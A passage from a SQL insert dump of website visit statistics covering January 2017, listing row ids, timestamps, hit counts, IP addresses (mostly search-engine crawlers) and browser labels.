0,0,'66.249.64.74','chrome'),(84302,1484925811,1,1,0,0,'93.158.152.61','other'),(84303,1484926169,1,0,1,0,'66.249.64.21',''),(84304,1484926342,1,1,0,0,'5.255.253.26','other'),(84305,1484926822,1,1,0,0,'46.211.156.242','other'),(84306,1484926858,1,0,1,0,'66.249.64.74',''),(84307,1484927824,1,1,0,0,'5.9.111.70','other'),(84308,1484927965,1,1,0,0,'37.53.122.253','chrome'),(84309,1484928097,1,1,0,0,'94.179.125.139','firefox'),(84310,1484928423,1,0,1,0,'66.249.64.27',''),(84311,1484928734,1,1,0,0,'91.196.178.71','firefox'),(84312,1484928736,2,0,2,0,'66.249.64.21',''),(84313,1484930154,1,0,1,0,'66.249.64.27',''),(84314,1484930892,1,0,1,0,'66.249.64.21',''),(84315,1484931150,1,0,1,0,'66.249.64.24',''),(84316,1484931965,1,1,0,0,'40.77.167.4','other'),(84317,1484932161,2,0,2,0,'66.249.64.24',''),(84318,1484932465,2,0,2,0,'66.249.64.21',''),(84319,1484933144,1,1,0,0,'40.77.167.4','other'),(84320,1484933350,1,0,1,0,'66.249.69.56',''),(84321,1484933485,1,1,0,0,'37.54.56.6','chrome'),(84322,1484933491,1,1,0,0,'66.102.9.29','chrome'),(84323,1484934247,1,1,0,0,'46.211.200.191','chrome'),(84324,1484934608,1,0,1,0,'66.249.69.52',''),(84325,1484935021,1,1,0,0,'66.249.69.52','chrome'),(84326,1484935853,1,1,0,0,'91.196.178.162','chrome'),(84327,1484936163,1,1,0,0,'40.77.167.4','other'),(84328,1484937102,1,1,0,0,'130.193.37.7','other'),(84329,1484937207,1,0,1,0,'66.249.75.25',''),(84330,1484937605,2,0,2,0,'66.249.69.60',''),(84331,1484937625,1,0,1,0,'66.249.69.56',''),(84332,1484937725,1,1,0,0,'167.114.233.118','firefox'),(84333,1484937881,1,1,0,0,'141.8.142.61','other'),(84334,1484938007,1,1,0,0,'117.78.13.53','other'),(84335,1484938009,1,1,0,0,'130.193.51.19','other'),(84336,1484938134,1,1,0,0,'141.8.183.25','other'),(84337,1484938260,1,1,0,0,'5.255.253.67','other'),(84338,1484939128,1,0,1,0,'66.249.69.56',''),(84339,1484939597,1,0,1,0,'66.249.75.28',''),(84340,1484939775,1,1,0,0,'141.8.183.19','other'),(84341,1484939883,2,0,2,0,'66.249.69.52',''),(84342,1484940141,1,1,0,0,'130.193.51.19','other'),(84343,1484940242,1,1,0,0,'141.8.142.175','other'),(84344,1484941243,2,2,0,0,'141.8.183.25','other'),(84345,1484942037,1,1,0,0,'91.196.178.72','chrome'),(84346,1484942117,1,1,0,0,'40.77.167.4','other'),(84347,1484942237,1,1,0,0,'93.158.152.84','other'),(84348,1484942335,1,0,1,0,'66.249.69.56',''),(84349,1484942579,3,3,0,0,'43.252.230.100','other'),(84350,1484943303,1,1,0,0,'141.8.142.58','other'),(84351,1484943349,1,0,1,0,'66.249.69.52',''),(84352,1484944902,1,1,0,0,'141.8.142.58','other'),(84353,1484944991,1,1,0,0,'193.34.173.227','chrome'),(84354,1484945361,1,1,0,0,'130.193.50.34','other'),(84355,1484945492,1,1,0,0,'141.8.183.25','other'),(84356,1484945981,1,1,0,0,'93.158.152.84','other'),(84357,1484946109,1,1,0,0,'141.8.132.10','other'),(84358,1484946313,1,1,0,0,'91.196.178.162','other'),(84359,1484946630,1,1,0,0,'141.8.142.61','other'),(84360,1484946992,1,1,0,0,'141.8.142.175','other'),(84361,1484947141,1,1,0,0,'141.8.183.25','other'),(84362,1484948989,1,1,0,0,'66.249.75.28','chrome'),(84363,1484949035,1,1,0,0,'66.249.79.182','chrome'),(84364,1484949061,1,1,0,0,'66.249.69.60','chrome'),(84365,1484949285,1,1,0,0,'66.249.75.25','chrome'),(84366,1484950543,1,0,1,0,'66.249.69.52',''),(84367,1484950956,1,0,1,0,'66.249.69.60',''),(84368,1484950988,1,1,0,0,'40.77.167.4','other'),(84369,1484952426,1,0,1,0,'66.249.69.60',''),(84370,1484954669,1,1,0,0,'40.77.167.4','other'),(84371,1484955728,1,0,1,0,'66.249.69.56',''),(84372,1484957167,1,0,1,0,'66.249.69.60',''),(84373,1484958572,1,1,0,0,'5.164.235.118','msie'),(84374,1484958786,1,1,0,0,'40.77.167.4','other'),(84375,1484959033,1,0,1,0,'66.249.69.56',''),(84376,1484959335,1,0,1,0,'66.249.69.52',''),(84377,1484961964,1,1,0,0,'180.76.15.26','other'),(84378,1484962001,1,1,0,0,'141.8.142.58','other'),(84379,1484963469,1,1,0,0,'141.8.183.25','other'),(84380,1484964374,1,1,0,0,'188.32.176.195','firefox'),(84381,1484965246,1,1,0,0,'192.36.27.6','chrome'),(84382,1484965903,1,0,1,0,'66.249.69.60',''),(84383,1484967247,1,1,0,0,'130.193.51.19','other'),(84384,1484971264,1,1,0,0,'141.8.142.61','other'),(84385,1484971389,1,1,0,0,'141.8.142.58','other'),(84386,1484971485,1,0,1,0,'66.249.69.60',''),(84387,1484971813,1,1,0,0,'130.193.51.19','other'),(84388,1484974336,1,1,0,0,'141.8.142.67','other'),(84389,1484975036,1,1,0,0,'130.193.50.34','other'),(84390,1484975240,1,1,0,0,'141.8.142.175','other'),(84391,1484975523,2,2,0,0,'91.200.12.49','msie'),(84392,1484975893,1,0,1,0,'66.249.69.60',''),(84393,1484977422,1,0,1,0,'66.249.69.56',''),(84394,1484977549,1,1,0,0,'141.8.142.58','other'),(84395,1484977728,1,1,0,0,'180.76.15.138','other'),(84396,1484978543,1,1,0,0,'141.0.12.18','other'),(84397,1484978583,1,1,0,0,'95.221.249.140','msie'),(84398,1484979145,1,1,0,0,'93.158.152.84','other'),(84399,1484979179,1,0,1,0,'66.249.75.25',''),(84400,1484979970,1,0,1,0,'66.249.69.56',''),(84401,1484980083,1,0,1,0,'66.249.69.60',''),(84402,1484980486,1,1,0,0,'91.196.178.162','other'),(84403,1484980725,2,2,0,0,'95.213.141.126','opera'),(84404,1484980864,1,1,0,0,'141.8.142.58','other'),(84405,1484981376,1,1,0,0,'141.8.142.61','other'),(84406,1484983167,1,1,0,0,'91.196.178.162','other'),(84407,1484984950,1,0,1,0,'66.249.69.56',''),(84408,1484985137,1,1,0,0,'92.113.175.54','firefox'),(84409,1484985148,1,1,0,0,'93.158.152.84','other'),(84410,1484985914,1,1,0,0,'94.180.196.126','msie'),(84411,1484986031,2,0,2,0,'66.249.69.52',''),(84412,1484986698,1,1,0,0,'37.115.67.243','chrome'),(84413,1484986818,1,0,1,0,'66.249.69.56',''),(84414,1484988614,1,0,1,0,'66.249.69.60',''),(84415,1484988643,1,1,0,0,'95.28.179.101','chrome'),(84416,1484989216,1,0,1,0,'66.249.69.52',''),(84417,1484989316,1,1,0,0,'141.8.183.19','other'),(84418,1484989989,1,0,1,0,'66.249.69.56',''),(84419,1484991322,1,0,1,0,'66.249.69.56',''),(84420,1484992854,99,99,0,0,'208.43.225.85','other'),(84421,1484992989,10,10,0,0,'69.58.178.59','firefox'),(84422,1484993032,23,23,0,0,'208.43.225.84','other'),(84423,1484993454,1,1,0,0,'91.196.178.34','firefox'),(84424,1484993461,1,1,0,0,'141.8.142.67','other'),(84425,1484993538,1,1,0,0,'141.8.142.61','other'),(84426,1484993604,2,2,0,0,'130.193.51.19','other'),(84427,1484993710,1,1,0,0,'93.158.152.84','other'),(84428,1484994412,2,2,0,0,'130.193.50.34','other'),(84429,1484996272,1,0,1,0,'68.180.229.254',''),(84430,1484996466,2,2,0,0,'141.8.183.25','other'),(84431,1484996550,1,1,0,0,'130.193.51.19','other'),(84432,1484996615,1,1,0,0,'141.8.142.175','other'),(84433,1484996679,1,0,1,0,'66.249.69.60',''),(84434,1484996755,1,1,0,0,'141.8.183.19','other'),(84435,1484996899,1,1,0,0,'141.8.142.61','other'),(84436,1484997117,1,1,0,0,'130.193.50.34','other'),(84437,1484997616,1,1,0,0,'66.249.69.56','chrome'),(84438,1484997856,1,1,0,0,'40.77.167.19','other'),(84439,1484997945,1,1,0,0,'66.249.69.60','chrome'),(84440,1484998753,1,1,0,0,'195.154.181.15','chrome'),(84441,1484999834,1,1,0,0,'130.193.51.19','other'),(84442,1484999917,1,1,0,0,'141.8.183.25','other'),(84443,1485000466,1,1,0,0,'92.113.175.54','firefox'),(84444,1485000511,1,1,0,0,'91.196.178.38','chrome'),(84445,1485000928,1,1,0,0,'141.8.142.67','other'),(84446,1485001035,1,1,0,0,'141.8.142.175','other'),(84447,1485002554,1,0,1,0,'66.249.69.52',''),(84448,1485002767,2,1,1,0,'66.249.69.56',''),(84449,1485005372,1,0,1,0,'66.249.69.60',''),(84450,1485005757,1,1,0,0,'163.172.64.188','other'),(84451,1485005959,1,0,1,0,'66.249.69.56',''),(84452,1485005982,1,1,0,0,'163.172.64.234','other'),(84453,1485006035,1,1,0,0,'157.55.39.152','other'),(84454,1485006341,1,1,0,0,'66.249.75.25','chrome'),(84455,1485006543,1,1,0,0,'66.249.69.56','chrome'),(84456,1485007787,1,1,0,0,'163.172.64.217','other'),(84457,1485008955,1,1,0,0,'141.8.142.61','other'),(84458,1485010476,1,1,0,0,'141.8.142.175','other'),(84459,1485011461,1,0,1,0,'66.249.69.52',''),(84460,1485011734,1,1,0,0,'95.24.154.225','msie'),(84461,1485012591,1,0,1,0,'66.249.75.25',''),(84462,1485013244,1,1,0,0,'195.154.181.15','chrome'),(84463,1485014130,1,0,1,0,'66.249.75.22',''),(84464,1485014166,1,1,0,0,'95.28.188.148','msie'),(84465,1485014351,1,1,0,0,'176.105.204.126','firefox'),(84466,1485014712,1,1,0,0,'66.249.93.157','chrome'),(84467,1485015060,1,1,0,0,'130.193.50.34','other'),(84468,1485015078,2,1,1,0,'66.249.69.52',''),(84469,1485015198,1,1,0,0,'141.8.142.175','other'),(84470,1485015237,1,1,0,0,'91.196.178.36','chrome'),(84471,1485015343,1,1,0,0,'130.193.51.19','other'),(84472,1485015467,1,1,0,0,'141.8.183.19','other'),(84473,1485016663,1,0,1,0,'66.249.69.60',''),(84474,1485017196,1,0,1,0,'66.249.69.56',''),(84475,1485017534,1,1,0,0,'66.249.64.183','chrome'),(84476,1485017549,1,1,0,0,'66.249.64.179','chrome'),(84477,1485017796,1,0,1,0,'66.249.64.187',''),(84478,1485019056,2,0,2,0,'66.249.64.179',''),(84479,1485019593,2,0,2,0,'66.249.64.187',''),(84480,1485020414,1,0,1,0,'66.249.64.57',''),(84481,1485021733,1,1,0,0,'66.249.64.183','chrome'),(84482,1485022777,1,0,1,0,'66.249.64.187',''),(84483,1485023053,1,1,0,0,'40.77.167.0','other'),(84484,1485023416,1,1,0,0,'180.76.15.29','other'),(84485,1485023952,1,0,1,0,'66.249.64.179',''),(84486,1485024466,1,1,0,0,'141.8.142.175','other'),(84487,1485024821,1,1,0,0,'66.249.64.57','chrome'),(84488,1485025608,1,0,1,0,'66.249.64.187',''),(84489,1485025981,1,1,0,0,'91.124.113.85','other'),(84490,1485026037,1,0,1,0,'66.249.64.179',''),(84491,1485027982,1,1,0,0,'141.8.142.58','other'),(84492,1485027996,1,1,0,0,'66.249.64.187','chrome'),(84493,1485028379,1,0,1,0,'66.249.64.179',''),(84494,1485028414,1,1,0,0,'130.193.51.19','other'),(84495,1485028568,1,1,0,0,'141.8.142.61','other'),(84496,1485028860,1,1,0,0,'93.158.152.84','other'),(84497,1485029174,1,1,0,0,'141.8.183.25','other'),(84498,1485029326,1,1,0,0,'93.158.152.40','other'),(84499,1485031359,1,1,0,0,'130.193.50.38','other'),(84500,1485031800,1,1,0,0,'141.8.142.58','other'),(84501,1485032123,1,1,0,0,'141.8.142.25','other'),(84502,1485032240,1,1,0,0,'180.76.15.154','other'),(84503,1485032414,2,2,0,0,'141.8.183.25','other'),(84504,1485032549,1,1,0,0,'94.244.155.35','chrome'),(84505,1485032720,1,0,1,0,'66.249.64.183',''),(84506,1485033045,1,1,0,0,'141.0.12.158','other'),(84507,1485033090,1,1,0,0,'82.145.222.228','other'),(84508,1485033389,1,1,0,0,'130.193.51.74','other'),(84509,1485033659,1,1,0,0,'141.8.142.67','other'),(84510,1485034308,1,1,0,0,'185.26.180.221','other'),(84511,1485034621,1,1,0,0,'163.172.64.188','other'),(84512,1485035128,1,1,0,0,'5.255.253.67','other'),(84513,1485035130,1,1,0,0,'130.193.50.34','other'),(84514,1485035196,1,1,0,0,'130.193.51.14','other'),(84515,1485035236,1,1,0,0,'141.8.132.41','other'),(84516,1485035316,1,1,0,0,'93.158.152.61','other'),(84517,1485036647,1,1,0,0,'93.158.152.51','other'),(84518,1485038693,1,1,0,0,'37.73.224.82','chrome'),(84519,1485038776,1,1,0,0,'40.77.167.0','other'),(84520,1485039284,1,1,0,0,'130.193.51.19','other'),(84521,1485039324,1,0,1,0,'68.180.229.254',''),(84522,1485039492,1,1,0,0,'66.249.64.61','chrome'),(84523,1485039530,1,0,1,0,'66.249.64.179',''),(84524,1485041589,1,1,0,0,'157.55.39.152','other'),(84525,1485042373,1,1,0,0,'141.8.142.58','other'),(84526,1485042475,1,0,1,0,'66.249.64.179',''),(84527,1485042806,1,0,1,0,'66.249.64.187',''),(84528,1485043365,1,1,0,0,'141.8.142.58','other'),(84529,1485043700,1,1,0,0,'91.196.178.71','chrome'),(84530,1485044373,1,1,0,0,'176.14.38.9','msie'),(84531,1485045002,1,1,0,0,'141.8.183.19','other'),(84532,1485045149,1,1,0,0,'157.55.39.152','other'),(84533,1485045662,1,0,1,0,'66.249.64.61',''),(84534,1485045765,1,1,0,0,'130.193.51.14','other'),(84535,1485046202,1,1,0,0,'130.193.50.34','other'),(84536,1485046693,1,1,0,0,'130.193.50.4','other'),(84537,1485046751,1,1,0,0,'163.172.64.220','other'),(84538,1485046898,1,1,0,0,'178.154.149.10','other'),(84539,1485046901,1,1,0,0,'141.8.142.175','other'),(84540,1485048824,1,0,1,0,'66.249.64.179',''),(84541,1485049248,1,1,0,0,'130.193.50.34','other'),(84542,1485049566,1,1,0,0,'141.8.183.19','other'),(84543,1485049648,1,1,0,0,'141.8.142.61','other'),(84544,1485049768,1,0,1,0,'66.249.64.187',''),(84545,1485049889,1,1,0,0,'141.8.142.175','other'),(84546,1485051451,1,0,1,0,'66.249.64.61',''),(84547,1485052144,1,0,1,0,'66.249.64.187',''),(84548,1485053236,1,1,0,0,'130.193.50.34','other'),(84549,1485053391,1,0,1,0,'66.249.64.187',''),(84550,1485053543,1,1,0,0,'176.195.191.114','other'),(84551,1485054072,1,0,1,0,'66.249.64.57',''),(84552,1485056433,1,0,1,0,'66.249.64.187',''),(84553,1485056888,1,1,0,0,'141.8.132.10','other'),(84554,1485058300,1,0,1,0,'66.249.64.183',''),(84555,1485058523,1,0,1,0,'66.249.64.187',''),(84556,1485058529,1,0,1,0,'66.249.64.179',''),(84557,1485059289,1,1,0,0,'66.249.64.179','chrome'),(84558,1485060507,1,0,1,0,'66.249.64.179',''),(84559,1485062510,2,0,2,0,'66.249.64.187',''),(84560,1485063722,1,1,0,0,'40.77.167.4','other'),(84561,1485067128,1,1,0,0,'66.249.64.183','chrome'),(84562,1485067324,1,0,1,0,'66.249.64.187',''),(84563,1485067596,1,1,0,0,'163.172.64.245','other'),(84564,1485067761,1,1,0,0,'212.15.140.188','firefox'),(84565,1485067879,2,2,0,0,'94.179.24.173','firefox'),(84566,1485068041,1,0,1,0,'66.249.64.183',''),(84567,1485069463,1,1,0,0,'40.77.167.0','other'),(84568,1485069569,1,1,0,0,'66.102.9.29','chrome'),(84569,1485069867,1,0,1,0,'66.249.64.183',''),(84570,1485070179,1,0,1,0,'66.249.64.187',''),(84571,1485071489,3,3,0,0,'88.198.16.153','other'),(84572,1485073111,1,1,0,0,'163.172.64.245','other'),(84573,1485074130,1,0,1,0,'66.249.64.61',''),(84574,1485075459,1,1,0,0,'163.172.64.183','other'),(84575,1485075510,1,1,0,0,'92.113.175.54','firefox'),(84576,1485076594,1,1,0,0,'141.0.13.208','other'),(84577,1485077179,1,0,1,0,'66.249.64.183',''),(84578,1485079297,1,0,1,0,'66.249.64.61',''),(84579,1485080010,1,0,1,0,'66.249.64.187',''),(84580,1485082004,1,1,0,0,'213.169.74.137','chrome'),(84581,1485082536,1,0,1,0,'66.249.64.179',''),(84582,1485083027,1,1,0,0,'130.193.51.74','other'),(84583,1485083028,1,1,0,0,'130.193.50.4','other'),(84584,1485083279,1,1,0,0,'92.113.175.54','firefox'),(84585,1485083895,2,0,2,0,'66.249.64.187',''),(84586,1485084137,1,0,1,0,'68.180.229.254',''),(84587,1485085216,1,1,0,0,'157.55.39.18','other'),(84588,1485085459,1,1,0,0,'66.249.64.59','chrome'),(84589,1485086324,1,1,0,0,'40.77.167.4','other'),(84590,1485086376,1,1,0,0,'66.249.64.57','chrome'),(84591,1485086455,1,1,0,0,'5.228.20.211','msie'),(84592,1485089366,1,1,0,0,'163.172.64.253','other'),(84593,1485090578,1,0,1,0,'66.249.64.57',''),(84594,1485090604,1,0,1,0,'66.249.64.179',''),(84595,1485090629,1,1,0,0,'66.249.64.61','chrome'),(84596,1485090670,1,1,0,0,'66.249.64.59','chrome'),(84597,1485090913,2,0,2,0,'66.249.64.183',''),(84598,1485091765,2,2,0,0,'178.255.215.94','other'),(84599,1485092180,1,0,1,0,'66.249.64.183',''),(84600,1485092515,1,0,1,0,'66.249.64.187',''),(84601,1485092527,1,0,1,0,'66.249.64.59',''),(84602,1485093959,1,1,0,0,'94.179.95.130','chrome'),(84603,1485094329,1,1,0,0,'157.55.39.18','other'),(84604,1485095500,1,1,0,0,'163.172.64.247','other'),(84605,1485095999,1,1,0,0,'141.8.142.175','other'),(84606,1485096121,1,1,0,0,'130.193.50.38','other'),(84607,1485096250,1,1,0,0,'141.8.142.61','other'),(84608,1485096378,1,1,0,0,'5.255.253.68','other'),(84609,1485096708,1,1,0,0,'141.8.142.25','other'),(84610,1485096866,2,2,0,0,'130.193.50.6','other'),(84611,1485096949,1,0,1,0,'66.249.64.183',''),(84612,1485097006,1,1,0,0,'141.8.142.175','other'),(84613,1485097588,1,0,1,0,'66.249.64.179',''),(84614,1485097693,1,0,1,0,'66.249.64.61',''),(84615,1485098184,1,1,0,0,'141.8.142.58','other'),(84616,1485098332,1,1,0,0,'130.193.51.19','other'),(84617,1485098864,1,1,0,0,'93.158.152.51','other'),(84618,1485099023,1,1,0,0,'141.8.142.67','other'),(84619,1485099086,1,1,0,0,'163.172.64.217','other'),(84620,1485099149,1,1,0,0,'141.8.142.58','other'),(84621,1485100007,1,1,0,0,'93.158.152.84','other'),(84622,1485100579,1,1,0,0,'91.196.178.34','firefox'),(84623,1485101505,1,0,1,0,'66.249.64.183',''),(84624,1485101714,1,1,0,0,'66.249.64.61','chrome'),(84625,1485101723,1,1,0,0,'66.249.64.59','chrome'),(84626,1485102514,1,1,0,0,'93.158.152.84','other'),(84627,1485103251,1,0,1,0,'66.249.64.27',''),(84628,1485103351,1,0,1,0,'66.249.64.69',''),(84629,1485103954,1,1,0,0,'91.196.178.33','chrome'),(84630,1485104764,1,1,0,0,'163.172.64.186','other'),(84631,1485105945,1,1,0,0,'141.8.142.58','other'),(84632,1485106146,1,0,1,0,'66.249.64.27',''),(84633,1485106257,1,0,1,0,'66.249.64.69',''),(84634,1485108426,1,1,0,0,'163.172.64.188','other'),(84635,1485108679,1,0,1,0,'66.249.69.60',''),(84636,1485109335,1,1,0,0,'66.249.75.28','chrome'),(84637,1485109869,1,1,0,0,'141.8.142.61','other'),(84638,1485110531,1,1,0,0,'40.77.167.4','other'),(84639,1485111120,1,1,0,0,'91.196.178.37','chrome'),(84640,1485111206,1,1,0,0,'141.8.142.58','other'),(84641,1485111335,2,2,0,0,'82.145.221.158','other'),(84642,1485111421,1,1,0,0,'130.193.50.34','other'),(84643,1485112448,2,2,0,0,'141.0.13.198','other'),(84644,1485113840,1,1,0,0,'141.8.142.175','other'),(84645,1485113941,1,1,0,0,'66.102.9.29','chrome'),(84646,1485114042,1,1,0,0,'141.8.142.67','other'),(84647,1485114312,1,0,1,0,'66.249.69.52',''),(84648,1485114627,1,0,1,0,'66.249.75.25',''),(84649,1485114894,1,1,0,0,'93.158.152.84','other'),(84650,1485115019,1,1,0,0,'141.8.183.25','other'),(84651,1485115463,1,1,0,0,'157.55.39.140','other'),(84652,1485115589,1,1,0,0,'141.0.13.68','other'),(84653,1485116944,1,1,0,0,'163.172.64.220','other'),(84654,1485117201,1,1,0,0,'95.213.218.110','other'),(84655,1485117538,1,1,0,0,'141.8.142.175','other'),(84656,1485117539,1,1,0,0,'66.249.75.28','chrome'),(84657,1485117995,1,0,1,0,'66.249.75.22',''),(84658,1485118052,1,1,0,0,'141.8.183.19','other'),(84659,1485118421,1,1,0,0,'66.249.69.52','chrome'),(84660,1485118494,1,1,0,0,'130.193.50.34','other'),(84661,1485118620,1,1,0,0,'141.8.142.58','other'),(84662,1485120986,1,1,0,0,'180.76.15.153','other'),(84663,1485121862,1,1,0,0,'141.8.142.67','other'),(84664,1485122144,1,0,1,0,'66.249.75.22',''),(84665,1485122409,1,1,0,0,'163.172.64.246','other'),(84666,1485122702,1,1,0,0,'130.193.50.34','other'),(84667,1485123672,1,1,0,0,'66.249.75.28','chrome'),(84668,1485124197,1,0,1,0,'66.249.69.52',''),(84669,1485124373,1,1,0,0,'94.178.93.12','chrome'),(84670,1485124875,1,1,0,0,'66.249.69.52','chrome'),(84671,1485125068,1,1,0,0,'130.193.50.34','other'),(84672,1485125972,1,0,1,0,'66.249.75.22',''),(84673,1485126662,1,1,0,0,'130.193.51.19','other'),(84674,1485128168,1,1,0,0,'141.8.142.175','other'),(84675,1485128205,1,1,0,0,'178.255.215.94','other'),(84676,1485128427,1,1,0,0,'141.8.142.58','other'),(84677,1485128883,1,0,1,0,'66.249.69.60',''),(84678,1485128996,1,0,1,0,'66.249.69.52',''),(84679,1485129392,1,1,0,0,'141.8.142.61','other'),(84680,1485129517,1,1,0,0,'141.8.142.58','other'),(84681,1485129646,1,1,0,0,'141.8.142.67','other'),(84682,1485129867,1,1,0,0,'217.69.133.169','firefox'),(84683,1485130185,1,0,1,0,'66.249.69.56',''),(84684,1485130229,1,0,1,0,'68.180.229.254',''),(84685,1485130429,1,0,1,0,'66.249.75.28',''),(84686,1485132517,1,1,0,0,'157.55.39.18','other'),(84687,1485132541,1,1,0,0,'130.193.50.34','other'),(84688,1485133304,1,1,0,0,'130.193.51.19','other'),(84689,1485134722,1,1,0,0,'62.210.162.42','chrome'),(84690,1485136157,1,1,0,0,'141.8.142.58','other'),(84691,1485136302,1,1,0,0,'93.158.152.40','other'),(84692,1485136419,2,0,2,0,'66.249.69.56',''),(84693,1485136538,2,2,0,0,'130.193.51.19','other'),(84694,1485138421,1,1,0,0,'207.46.13.30','other'),(84695,1485138515,1,1,0,0,'157.55.39.18','other'),(84696,1485138836,1,1,0,0,'157.55.39.137','other'),(84697,1485138908,1,1,0,0,'141.8.183.19','other'),(84698,1485139017,1,0,1,0,'68.180.229.254',''),(84699,1485139066,1,1,0,0,'141.8.142.61','other'),(84700,1485140050,2,0,2,0,'66.249.69.56',''),(84701,1485140151,1,1,0,0,'130.193.51.19','other'),(84702,1485141435,1,0,1,0,'68.180.229.254',''),(84703,1485142556,1,1,0,0,'141.8.142.175','other'),(84704,1485142754,1,1,0,0,'66.249.75.28','chrome'),(84705,1485142961,2,2,0,0,'130.193.50.34','other'),(84706,1485143087,1,1,0,0,'141.8.183.25','other'),(84707,1485144536,2,2,0,0,'66.249.69.56','chrome'),(84708,1485145639,1,1,0,0,'217.69.133.219','other'),(84709,1485146006,1,0,1,0,'66.249.69.56',''),(84710,1485146208,1,1,0,0,'141.8.142.58','other'),(84711,1485146506,1,1,0,0,'141.8.183.25','other'),(84712,1485147655,1,1,0,0,'91.225.73.146','chrome'),(84713,1485147675,1,1,0,0,'141.8.142.175','other'),(84714,1485148344,1,1,0,0,'66.249.75.22','chrome'),(84715,1485149221,1,0,1,0,'66.249.69.56',''),(84716,1485150137,1,1,0,0,'91.196.178.67','firefox'),(84717,1485150252,1,1,0,0,'141.8.142.61','other'),(84718,1485150644,1,1,0,0,'130.193.50.34','other'),(84719,1485150769,1,1,0,0,'141.8.142.58','other'),(84720,1485151804,1,1,0,0,'40.77.167.0','other'),(84721,1485153132,1,1,0,0,'91.196.177.46','chrome'),(84722,1485153425,1,1,0,0,'91.196.178.72','chrome'),(84723,1485153768,1,1,0,0,'141.8.142.58','other'),(84724,1485155667,1,1,0,0,'130.180.219.214','firefox'),(84725,1485155955,1,1,0,0,'193.194.127.217','firefox'),(84726,1485156358,1,1,0,0,'91.196.178.66','firefox'),(84727,1485156366,1,1,0,0,'91.196.178.66','chrome'),(84728,1485156689,1,1,0,0,'95.135.239.54','firefox'),(84729,1485156895,1,1,0,0,'91.211.132.60','chrome'),(84730,1485156909,1,1,0,0,'130.193.51.19','other'),(84731,1485156955,1,1,0,0,'91.196.178.67','chrome'),(84732,1485157214,1,0,1,0,'66.249.75.28',''),(84733,1485157395,1,1,0,0,'91.196.178.72','chrome'),(84734,1485157530,1,1,0,0,'91.196.178.164','chrome'),(84735,1485157543,1,1,0,0,'130.193.37.21','other'),(84736,1485157718,1,1,0,0,'91.196.178.66','firefox'),(84737,1485158118,1,1,0,0,'91.196.178.69','firefox'),(84738,1485158160,1,1,0,0,'95.132.135.70','firefox'),(84739,1485159621,1,1,0,0,'66.249.69.56','chrome'),(84740,1485159898,115,115,0,0,'94.154.239.69','other'),(84741,1485159992,1,1,0,0,'163.172.64.224','other'),(84742,1485160477,1,1,0,0,'91.196.178.164','chrome'),(84743,1485160563,1,1,0,0,'46.63.96.54','opera'),(84744,1485160765,1,1,0,0,'141.8.142.67','other'),(84745,1485161467,1,1,0,0,'130.193.50.34','other'),(84746,1485161822,1,1,0,0,'91.196.178.72','chrome'),(84747,1485163285,1,0,1,0,'66.249.69.56',''),(84748,1485163474,1,1,0,0,'163.172.64.187','other'),(84749,1485163758,1,1,0,0,'91.196.178.66','chrome'),(84750,1485164161,1,1,0,0,'178.255.215.94','other'),(84751,1485164478,1,1,0,0,'180.76.15.147','other'),(84752,1485164869,1,1,0,0,'93.74.212.147','firefox'),(84753,1485165035,1,1,0,0,'141.8.142.58','other'),(84754,1485165059,1,1,0,0,'93.158.152.84','other'),(84755,1485165269,1,0,1,0,'66.249.69.60',''),(84756,1485166121,1,1,0,0,'94.179.77.225','firefox'),(84757,1485166873,1,1,0,0,'95.134.202.158','firefox'),(84758,1485167821,1,1,0,0,'66.249.69.52','chrome'),(84759,1485167910,1,1,0,0,'157.55.39.137','other'),(84760,1485168191,1,1,0,0,'194.44.183.56','firefox'),(84761,1485168253,1,1,0,0,'207.46.13.30','other'),(84762,1485168714,1,1,0,0,'91.196.178.37','chrome'),(84763,1485169231,1,1,0,0,'217.20.167.17','chrome'),(84764,1485171109,1,0,1,0,'66.249.69.52',''),(84765,1485171128,1,1,0,0,'94.178.17.85','chrome'),(84766,1485171322,1,1,0,0,'157.55.39.137','other'),(84767,1485171477,1,1,0,0,'141.8.142.175','other'),(84768,1485171814,1,1,0,0,'163.172.64.225','other'),(84769,1485171967,1,1,0,0,'163.172.64.232','other'),(84770,1485172446,1,1,0,0,'163.172.64.248','other'),(84771,1485172874,1,1,0,0,'91.196.177.46','chrome'),(84772,1485173185,2,0,2,0,'68.180.229.254',''),(84773,1485173787,1,1,0,0,'91.196.178.66','firefox'),(84774,1485174354,1,1,0,0,'178.92.91.71','chrome'),(84775,1485175653,2,2,0,0,'141.8.183.25','other'),(84776,1485176013,1,1,0,0,'91.196.178.134','firefox'),(84777,1485176019,1,1,0,0,'37.54.169.57','chrome'),(84778,1485176441,1,0,1,0,'66.249.69.56',''),(84779,1485176802,2,2,0,0,'130.193.50.34','other'),(84780,1485176871,1,1,0,0,'91.196.178.66','firefox'),(84781,1485177532,1,1,0,0,'91.196.177.26','chrome'),(84782,1485178175,1,1,0,0,'195.10.210.49','chrome'),(84783,1485178318,1,1,0,0,'93.183.226.149','chrome'),(84784,1485178478,1,1,0,0,'163.172.64.180','other'),(84785,1485179015,1,0,1,0,'66.249.75.22',''),(84786,1485179378,1,1,0,0,'178.95.211.178','chrome'),(84787,1485179567,2,2,0,0,'130.193.50.34','other'),(84788,1485180748,1,1,0,0,'91.196.178.66','firefox'),(84789,1485181021,1,1,0,0,'66.249.75.22','chrome'),(84790,1485181418,1,1,0,0,'193.194.127.217','firefox'),(84791,1485181540,1,1,0,0,'91.196.178.72','chrome'),(84792,1485182919,1,1,0,0,'91.196.178.72','chrome'),(84793,1485182938,1,1,0,0,'94.179.73.186','chrome'),(84794,1485183201,1,1,0,0,'91.196.178.66','firefox'),(84795,1485183290,1,1,0,0,'66.249.93.14','chrome'),(84796,1485183691,1,1,0,0,'91.196.177.26','firefox'),(84797,1485183991,1,1,0,0,'178.95.244.86','chrome'),(84798,1485184034,1,1,0,0,'91.196.178.166','chrome'),(84799,1485184054,1,1,0,0,'91.196.178.72','chrome'),(84800,1485184321,1,1,0,0,'91.196.177.46','firefox'),(84801,1485184517,1,0,1,0,'68.180.229.254',''),(84802,1485185594,1,1,0,0,'130.193.50.34','other'),(84803,1485185773,2,2,0,0,'141.8.142.175','other'),(84804,1485186355,1,0,1,0,'68.180.229.254',''),(84805,1485187101,1,1,0,0,'130.193.51.19','other'),(84806,1485187169,1,1,0,0,'82.145.223.56','opera'),(84807,1485187303,1,1,0,0,'95.132.132.80','chrome'),(84808,1485187482,2,2,0,0,'130.193.50.34','other'),(84809,1485187910,1,1,0,0,'91.196.178.34','chrome'),(84810,1485188689,1,1,0,0,'163.172.64.216','other'),(84811,1485190181,1,0,1,0,'68.180.229.254',''),(84812,1485190945,1,1,0,0,'130.193.51.19','other'),(84813,1485191229,1,1,0,0,'141.8.142.85','other'),(84814,1